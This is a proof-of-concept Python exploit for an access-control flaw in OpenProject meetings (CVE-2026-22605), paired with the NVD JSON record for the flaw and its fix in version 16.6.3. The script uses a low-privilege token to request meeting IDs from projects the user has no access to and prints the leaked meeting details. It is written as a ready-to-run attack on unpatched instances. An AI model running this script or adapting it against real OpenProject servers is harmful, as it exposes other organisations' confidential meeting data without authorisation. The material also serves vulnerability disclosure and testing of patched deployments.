CVE-2026-22605

# CVE-2026-22605 PoC - OpenProject IDOR Meeting Access # This PoC demonstrates accessing meetings from projects the user has no access to import requests import json TARGET_URL = "https://vulnerable-openproject-instance.com" ATTACKER_TOKEN = "your_low_privilege_user_token" # User with View Meetings permission on any project TARGET_MEETING_ID = 12345 # Meeting ID from a project the attacker has no access to def exploit_meeting_access(): """ Exploit CVE-2026-22605: IDOR in OpenProject meeting access control Allows users with View Meetings permission to access meetings from inaccessible projects """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Try to access meeting details directly using meeting ID # The vulnerable endpoint doesn't properly verify project access endpoint = f"{TARGET_URL}/api/v3/meetings/{TARGET_MEETING_ID}" print(f"[*] Attempting to access meeting ID: {TARGET_MEETING_ID}") print(f"[*] Target endpoint: {endpoint}") response = requests.get(endpoint, headers=headers) if response.status_code == 200: meeting_data = response.json() print("[+] SUCCESS: Accessed meeting details from inaccessible project!") print(f"[+] Meeting Title: {meeting_data.get('title', 'N/A')}") print(f"[+] Project ID: {meeting_data.get('project', {}).get('id', 'N/A')}") print(f"[+] Full response: {json.dumps(meeting_data, indent=2)}") return True elif response.status_code == 403: print("[-] Access denied - target may be patched or token invalid") return False else: print(f"[-] Unexpected response: {response.status_code}") return False if __name__ == "__main__": exploit_meeting_access()

{"cve": {"id": "CVE-2026-22605", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:49.487", "lastModified": "2026-01-14T22:27:55.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. OpenProject versions prior to version 16.6.3, allowed users with the View Meetings permission on any project, to access meeting details of meetings that belonged to projects, the user does not have access to. This issue has been patched in version 16.6.3."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Las versiones de OpenProject anteriores a la versión 16.6.3 permitían a los usuarios con el permiso 'Ver reuniones' en cualquier proyecto, acceder a los detalles de reuniones que pertenecían a proyectos a los que el usuario no tenía acceso. Este problema ha sido parcheado en la versión 16.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.3", "matchCriteriaId": "B2267B9E-E4A8-4C9D-9BEF-BE744BAEDF0E"}]}]}], "references": [{"url": "https://github.com/opf/openproject/releases/tag/v16.6.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opf/openproject/security/advisories/GHSA-fq4m-pxvm-8x2j", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}